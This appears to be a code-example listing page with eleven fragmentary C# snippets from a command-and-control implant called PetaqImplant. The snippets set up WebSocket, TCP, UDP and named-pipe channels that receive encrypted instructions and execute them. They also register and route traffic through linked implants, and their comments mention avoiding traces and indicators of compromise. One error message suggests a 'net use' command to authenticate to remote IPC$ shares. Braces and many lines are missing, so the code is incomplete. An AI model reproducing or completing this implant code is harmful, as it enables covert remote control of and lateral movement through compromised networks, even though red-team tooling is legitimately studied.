Пример #1
        public override bool Send(string data = "")
            if (data == "")
                if (Status)
                    Console.Error.WriteLine("Data sending:\n{0}", Common.Decrypt(data));

                    //Data is writing to the Named client pipe...
                    Console.WriteLine("The Named Pipe is not connected.");
            catch (Exception e)
                Console.Error.WriteLine("Named Pipe Client Exception on Send: " + e.Message);
                Status = false; // setting the status to false
Пример #2
        public async Task Receive()
                while (webSocket.State == WebSocketState.Open)
                    Console.Error.WriteLine("Waiting for an instruction...");
                    byte[] rbuffer = new byte[receiveChunkSize];
                    var    result  = await webSocket.ReceiveAsync(new ArraySegment <byte>(rbuffer), CancellationToken.None);

                    string instruction = (string)Encoding.UTF8.GetString(rbuffer).Replace("\0", string.Empty);
                    instruction = Common.Decrypt(instruction);
                    Console.Error.WriteLine("Got an instruction:\n{0}", instruction);

                    if (result.MessageType == WebSocketMessageType.Close)
                        Console.Error.WriteLine("Socket is closing...");
                        await StopAsync();
            catch (Exception e)
                Console.Error.WriteLine("The service stopped responding: {0}", e);
                await StopAsync();
Пример #3
        public static void RegisterLinkedImplants()
            Console.WriteLine("Registering the linked sessions.");
            string link_data = Common.Encrypt("registerlinks " + Convert.ToBase64String(Encoding.UTF8.GetBytes(Common.GetLinkedImplantsJSON())));

Пример #4
        public void LinkedServiceSend(string output)
            // Decrypt the output for processing
            output = Common.Decrypt(output);

            // Instruction to process before sending
            string inst = Regex.Split(output, " ")[0];

            switch (inst)
            case "transmit":
                // Get the ID as the linked implant passes the data through
                string transmitId = Regex.Split(output, " ")[1];
                // Pass-Through the output to the linked service

            case "routeupdates":
                Console.WriteLine("Processing route updates coming from {0}", sessionId);
                // Routing protocol
                string route_data = output;
                if (Regex.Split(output, " ").Length == 2)
                    // don't touch the session ID as it's routed
                    // add the next hop to the route for received session ID
                    Console.WriteLine("Adding the route updates coming from {0}", sessionId);
                    Program.implantRoutes.TryAdd(Regex.Split(output, " ")[1], sessionId);
                    Console.WriteLine("The route updates coming from {0} passing through", sessionId);

                    // add the implant's ID to the route for the C2 root
                    route_data += " " + sessionId;
                // Pass-Through the output to the linked service

                // Sending the linked implant output to the linked service
                Program.LinkService.Send(Common.Encrypt("transmit " + sessionId + " " + output));
Пример #5
        public override void Start()
                // Setting up the variables for listener
                ListenPort = int.Parse(Program.configuration["LISTENPORT"]);

                // Setting the service status
                Status = true;

                // Listener is configuring
                UDPService = new UdpClient(ListenPort);

                while (Status)
                    //Console.Error.WriteLine("The EP is setting.");
                    IPEndPoint ep = new IPEndPoint(IPAddress.Any, ListenPort);

                    Console.Error.WriteLine("Waiting for linking... ");

                    // Read stream as string and process
                    while (Status)
                        // When data received, Endpoint gets updated
                        byte[] data = UDPService.Receive(ref ep);

                        // Copy the endpoint to the UDPClient to send data later
                        UDPClient = ep;

                        // Send registration info first when a socket established
                        if (!LinkStatus)
                            Console.Error.WriteLine("Registering the implant information.");
                            string registration_data = Common.Encrypt("register " + Convert.ToBase64String(Encoding.UTF8.GetBytes(Common.GetInfo())));

                        // Set the link status as data received
                        LinkStatus = true;

                        ////Instruction received from the UDP client...
                        string instruction = Encoding.UTF8.GetString(data);
                        instruction = Common.Decrypt(instruction);

                        ////Instruction is processing...
            catch (Exception e)
                Console.Error.WriteLine("UDP Service Exception on Receive: " + e.Message);
                Status     = false;
                LinkStatus = false;
Пример #6
        public override void Start()
                // Setting up the variables for listener
                ListenPort = int.Parse(Program.configuration["LISTENPORT"]);

                // Setting the service status
                Status = true;

                // Get a new session link.

                while (Status)
                    // Listener is configuring
                    TCPService = new TcpListener(IPAddress.Any, ListenPort);

                    // Start listening for client requests.

                    Console.Error.WriteLine("Waiting for linking... ");

                    // Perform a blocking call to accept requests.
                    TCPClient = TCPService.AcceptTcpClient();

                    Console.Error.WriteLine("The implant is being linked.");
                    LinkStatus = true;

                    Console.Error.WriteLine("Stopping the service as the implant is being linked.");
                    // Stopping the listener as the implant is being linked.

                    // Read stream as string and process
                    while (LinkStatus)
                        // Get a stream object for reading and writing
                        NetworkStream stream = TCPClient.GetStream();

                        // Creating StreamString class for string based communications
                        TCPClientStream = new StreamString(stream);

                        //Instruction received from the TCP client...
                        string instruction = TCPClientStream.ReadString();
                        instruction = Common.Decrypt(instruction);

                        //Instruction is processing...
            catch (Exception e)
                Console.Error.WriteLine("TCP Service Exception on Receive: " + e);
                Status     = false;
                LinkStatus = false;
Пример #7
        public async Task Receive()
                while (webSocket.State == WebSocketState.Open)
                    Console.Error.WriteLine("Waiting for an instruction...");
                    byte[] rbuffer = new byte[receiveChunkSize];
                    var    result  = await webSocket.ReceiveAsync(new ArraySegment <byte>(rbuffer), CancellationToken.None);

                    string instruction = Regex.Replace((string)Encoding.UTF8.GetString(rbuffer), "\0", string.Empty);
                    instruction = Common.Decrypt(instruction);
                    Console.Error.WriteLine("Got an instruction:\n{0}", instruction);

                    //If message is multi-part, get the second part and then construct the instruction
                    if (instruction.Contains("MULTIPARTTRANSMISSION"))
                        Console.Error.WriteLine("Getting second part of the instruction...");
                        int    partialChunkSize;
                        string clearinstruction;
                        string partialData = "";
                        // Get the data size and reconstruct the instruction
                        if (instruction.StartsWith("MULTIPARTTRANSMISSION"))
                            // Get the data size to read the buffer
                            partialChunkSize = int.Parse(Regex.Split(instruction, " ")[1]);
                            clearinstruction = String.Join(" ", Regex.Split(instruction, " ").SubArray(2, Regex.Split(instruction, " ").Length - 2));

                            while (partialData.Length < partialChunkSize)
                                // Receive the partial data and decrypt
                                byte[] pbuffer = new byte[partialChunkSize - partialData.Length];

                                result = await webSocket.ReceiveAsync(new ArraySegment <byte>(pbuffer), CancellationToken.None);

                                partialData += Regex.Replace((string)Encoding.UTF8.GetString(pbuffer), "\0", string.Empty);

                            partialData = Common.Decrypt(partialData);
                            // Get the data size to read the buffer and add transmit header (transmit ID)
                            partialChunkSize = int.Parse(Regex.Split(instruction, " ")[3]);

                            // Reconstruct the transmission
                            clearinstruction = "transmit " + Regex.Split(instruction, " ")[1] + " " + String.Join(" ", Regex.Split(instruction, " ").SubArray(4, Regex.Split(instruction, " ").Length - 4));

                            while (partialData.Length < partialChunkSize)
                                // Receive the partial data and decrypt
                                byte[] pbuffer = new byte[partialChunkSize - partialData.Length];
                                result = await webSocket.ReceiveAsync(new ArraySegment <byte>(pbuffer), CancellationToken.None);

                                partialData += Regex.Replace((string)Encoding.UTF8.GetString(pbuffer), "\0", string.Empty);

                            partialData = Common.Decrypt(partialData);
                            // As format seen below, remove the transmit and ID
                            // transmit V8OLRLP49S3OR1J3TJ3E MjMuamtsbDIzaWg0MzIK
                            partialData = Regex.Split(partialData, " ")[2];

                        // add the partial data to the reconstructed instruction
                        clearinstruction = Regex.Replace(clearinstruction, "FILECONTENTPLACEHOLDER", partialData);
                        instruction      = clearinstruction;


                    // If scenario is requested call scenario, otherwise run instructions
                    if (instruction.StartsWith("scenario"))
                        if (Regex.Split(instruction, " ").Length < 3)
                            // Set the socket as the Console output
                            Program.consoleIO = Console.Out;
                            Console.SetOut(new SocketWriter());
                            // Raise the error
                            Console.WriteLine("Usage: scenario ImplantID filepath");
                            // scenario instruction format:
                            // scenario file BASE64STRING
                            string scenario_b64 = Regex.Split(instruction, " ")[2];
                            // send the Base64 encoded scenario to run
                        // run the instruction received
                        PetaqImplant.Instructions.Instruct(instruction, new SocketWriter());

                    if (result.MessageType == WebSocketMessageType.Close)
                        Console.Error.WriteLine("Socket is closing...");
                        await StopAsync();
            catch (Exception e)
                Console.Error.WriteLine("The service stopped responding: {0}", e);
                await StopAsync(true);
Пример #8
        public override void Start()
            Status = true;
            while (Status)
                Console.Error.WriteLine("Service loop starting...");
                    // As the Named Pipes on the network only accessible
                    // via SMB IPC$ connections established
                    // we need to connect to the remote server IPC$
                    // if necessary with the creds
                    // This points out that named pipe over network
                    // with null IPC $ is possible
                    // However, the pipe name should appear on the registry
                    // which creates traces, IOCs
                    // https://support.microsoft.com/en-au/help/813414/how-to-create-an-anonymous-pipe-that-gives-access-to-everyone

                    // Allowing "Everyone" for the named pipe access
                    PipeSecurity   ps         = new PipeSecurity();
                    PipeAccessRule AccessRule = new PipeAccessRule("Everyone", PipeAccessRights.FullControl, System.Security.AccessControl.AccessControlType.Allow);

                    // Currently implementation has 2 named pipes in use for IO
                    NamedPipeServiceRead  = new NamedPipeServerStream(NamedPipeServiceName + "i", PipeDirection.InOut, 1);
                    NamedPipeServiceWrite = new NamedPipeServerStream(NamedPipeServiceName + "o", PipeDirection.InOut, 1);
                    //NamedPipeServiceRead = new NamedPipeServerStream(NamedPipeServiceName + "i", PipeDirection.InOut, 1, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 0, 0, ps);
                    //NamedPipeServiceWrite = new NamedPipeServerStream(NamedPipeServiceName + "o", PipeDirection.InOut, 1, PipeTransmissionMode.Byte, PipeOptions.Asynchronous, 0, 0, ps);

                    Console.Error.WriteLine("Waiting for linking...");
                    // Waiting for linking for both service
                    // Setting write stream for the write named pipe
                    NamedPipeServiceWriteStream = new StreamString(NamedPipeServiceWrite);
                    // There are 2 connections, so linking starts
                    Console.Error.WriteLine("The implant is being linked.");
                    // If there is no instruction sent to the pipe
                    // the implant doesn't sent the data in buffer to the link
                    // This loop is not great for bidirectional comms
                    // To be fixed for future callbacks and triggers
                    while (true)
                        LinkStatus = true;

                        //Create the stream
                        NamedPipeServiceReadStream = new StreamString(NamedPipeServiceRead);

                        //New Named client connected
                        string instruction = NamedPipeServiceReadStream.ReadString();

                        //Instruction received from the Named client...
                        instruction = Common.Decrypt(instruction);

                        //Console.Error.WriteLine("Data received:\n{0}", instruction);

                        // If scenario is requested call scenario, otherwise run instructions
                        if (instruction.StartsWith("scenario"))
                            if (Regex.Split(instruction, " ").Length < 3)
                                // Set the socket as the Console output
                                Program.consoleIO = Console.Out;
                                Console.SetOut(new SocketWriter());
                                // Raise the error
                                Console.WriteLine("Usage: scenario file filepath");
                                // scenario instruction format:
                                // scenario file BASE64STRING
                                string scenario_b64 = Regex.Split(instruction, " ")[2];
                                // send the Base64 encoded scenario to run
                            // run the instruction received
                            PetaqImplant.Instructions.Instruct(instruction, new SocketWriter());
                catch (Exception e)
                    Console.Error.WriteLine("Named Pipe Service Exception on Receive: " + e.Message);
                    LinkStatus = false;
Пример #9
        public override void Start()
                // Setting up the variables for listener
                ListenPort = int.Parse(Program.configuration["LISTENPORT"]);

                // Setting the service status
                Status = true;

                // Listener is configuring
                UDPService = new UdpClient(ListenPort);

                while (Status)
                    //Console.Error.WriteLine("The EP is setting.");
                    IPEndPoint ep = new IPEndPoint(IPAddress.Any, ListenPort);

                    Console.Error.WriteLine("Waiting for linking... ");

                    // Read stream as string and process
                    while (Status)
                        // When data received, Endpoint gets updated
                        byte[] data = UDPService.Receive(ref ep);

                        // Copy the endpoint to the UDPClient to send data later
                        UDPClient = ep;

                        // Send registration info first when a socket established
                        if (!LinkStatus)
                            Console.Error.WriteLine("Registering the implant information.");
                            string registration_data = Common.Encrypt("register " + Convert.ToBase64String(Encoding.UTF8.GetBytes(Common.GetInfo())));

                        // Set the link status as data received
                        LinkStatus = true;

                        ////Instruction received from the UDP client...
                        string instruction = Encoding.UTF8.GetString(data);
                        instruction = Common.Decrypt(instruction);

                        // If scenario is requested call scenario, otherwise run instructions
                        if (instruction.StartsWith("scenario"))
                            if (Regex.Split(instruction, " ").Length < 3)
                                // Set the socket as the Console output
                                Program.consoleIO = Console.Out;
                                Console.SetOut(new SocketWriter());
                                // Raise the error
                                Console.WriteLine("Usage: scenario file filepath");
                                // scenario instruction format:
                                // scenario file BASE64STRING
                                string scenario_b64 = Regex.Split(instruction, " ")[2];
                                // send the Base64 encoded scenario to run
                            // run the instruction received
                            PetaqImplant.Instructions.Instruct(instruction, new SocketWriter());
            catch (Exception e)
                Console.Error.WriteLine("UDP Service Exception on Receive: " + e.Message);
                Status     = false;
                LinkStatus = false;
Пример #10
        public override void Connect(string sid, string sa, string option = null)
            Console.Error.WriteLine("Named Pipe is linking.");

            ServerAddress = sa;
            sessionId     = sid;

            // Starting the Named Pipe Connection as a thread
            clientThread = new Thread(() =>
                    // Reurposed from the Microsoft sample implementation
                    // https://docs.microsoft.com/en-us/dotnet/standard/io/how-to-use-named-pipes-for-network-interprocess-communication

                    // Custom Named Pipe name support
                    if (option != null)
                        NamedPipeServiceName = option;

                    Console.Error.WriteLine("Named pipes are defining.");

                    // Creating the Named Pipe objects
                    NamedPipeClientRead = new NamedPipeClientStream(ServerAddress, NamedPipeServiceName + "o",
                                                                    PipeDirection.InOut, PipeOptions.Asynchronous,
                    NamedPipeClientWrite = new NamedPipeClientStream(ServerAddress, NamedPipeServiceName + "i",
                                                                     PipeDirection.InOut, PipeOptions.Asynchronous,

                    // As the Named Pipes on the network only accessible
                    // via SMB IPC$ connections established
                    // we need to connect to the remote server IPC$
                    // if necessary with the creds
                    // This points out that named pipe over network
                    // with null IPC $ is possible
                    // However, the pipe name should appear on the registry
                    // which creates traces, IOCs
                    // https://support.microsoft.com/en-au/help/813414/how-to-create-an-anonymous-pipe-that-gives-access-to-everyone

                    Console.Error.WriteLine("Named pipes on {0} are connecting.", ServerAddress);

                    // Connecting to the Named Pipes
                    Status = true;

                    // Register linked implants as registration started
                    Console.WriteLine("Session {0} is added to the linked sessions.", sessionId);

                    Console.Error.WriteLine("Streams are building.");

                    // Creating StreamStrings class for string based communications
                    NamedPipeClientReadStream  = new StreamString(NamedPipeClientRead);
                    NamedPipeClientWriteStream = new StreamString(NamedPipeClientWrite);

                    // Request registration first
                    if (!Registration)
                        // Requesting the registration
                    Console.WriteLine("Registration asked.");

                    //Ask route updates
                    //Console.WriteLine("Route updates is requesting...");
                    //Console.Error.WriteLine("Route update is requested. Status {0}", Status);

                    Console.Error.WriteLine("Read loop is starting...");

                    // Read Pipe stream as string and process
                    while (Status)
                        Console.Error.WriteLine("Listening to the pipe for data.");

                        // Reading the data from the socket
                        string output = NamedPipeClientReadStream.ReadString();

                        Console.Error.WriteLine("Data received:\n{0}", Common.Decrypt(output));

                        // Process the data and send to the linked service

                        // Asking route updates makes the service unresponsive
                        // Maybe waiting for a grace period would work
                        // Request route after the first response
                        //if (!Route)
                        //    // Requesting the registration
                        //    AskRouteUpdates();
                        //    Console.WriteLine("Route updates asked.");

                    Console.Error.WriteLine("Stopping listen to the pipe for data.");
                catch (Exception e)
                    string warn = "\nInvalid credentials error may occur if the logged on user has no access to remote server IPC$. Try this before linking 'net use \\\\servername\\IPC$ /user:domain\\user password'. Named pipe would accept null IPC$, though, but this time it leaves traces on the registry.";

                    Console.WriteLine("{0}\nNamed Pipe Client Exception on Connect/Receive: {1}", warn, e.Message);
                    // Dispose the Named pipe after use
Пример #11
        public override void Start()
                // Setting up the variables for listener
                ListenPort = int.Parse(Program.configuration["LISTENPORT"]);

                // Setting the service status
                Status = true;

                // Get a new session link.

                while (Status)
                    // Listener is configuring
                    TCPService = new TcpListener(IPAddress.Any, ListenPort);

                    // Start listening for client requests.

                    Console.Error.WriteLine("Waiting for linking... ");

                    // Perform a blocking call to accept requests.
                    TCPClient = TCPService.AcceptTcpClient();

                    Console.Error.WriteLine("The implant is being linked.");
                    LinkStatus = true;

                    Console.Error.WriteLine("Stopping the service as the implant is being linked.");
                    // Stopping the listener as the implant is being linked.

                    // Read stream as string and process
                    while (LinkStatus)
                        // Get a stream object for reading and writing
                        NetworkStream stream = TCPClient.GetStream();

                        // Creating StreamString class for string based communications
                        TCPClientStream = new StreamString(stream);

                        //Instruction received from the TCP client...
                        string instruction = TCPClientStream.ReadString();
                        instruction = Common.Decrypt(instruction);

                        // If scenario is requested call scenario, otherwise run instructions
                        if (instruction.StartsWith("scenario"))
                            if (Regex.Split(instruction, " ").Length < 3)
                                // Set the socket as the Console output
                                Program.consoleIO = Console.Out;
                                Console.SetOut(new SocketWriter());
                                // Raise the error
                                Console.WriteLine("Usage: scenario file filepath");
                                // scenario instruction format:
                                // scenario file BASE64STRING
                                string scenario_b64 = Regex.Split(instruction, " ")[2];
                                // send the Base64 encoded scenario to run
                            // run the instruction received
                            PetaqImplant.Instructions.Instruct(instruction, new SocketWriter());
            catch (Exception e)
                Console.Error.WriteLine("TCP Service Exception on Receive: " + e);
                Status     = false;
                LinkStatus = false;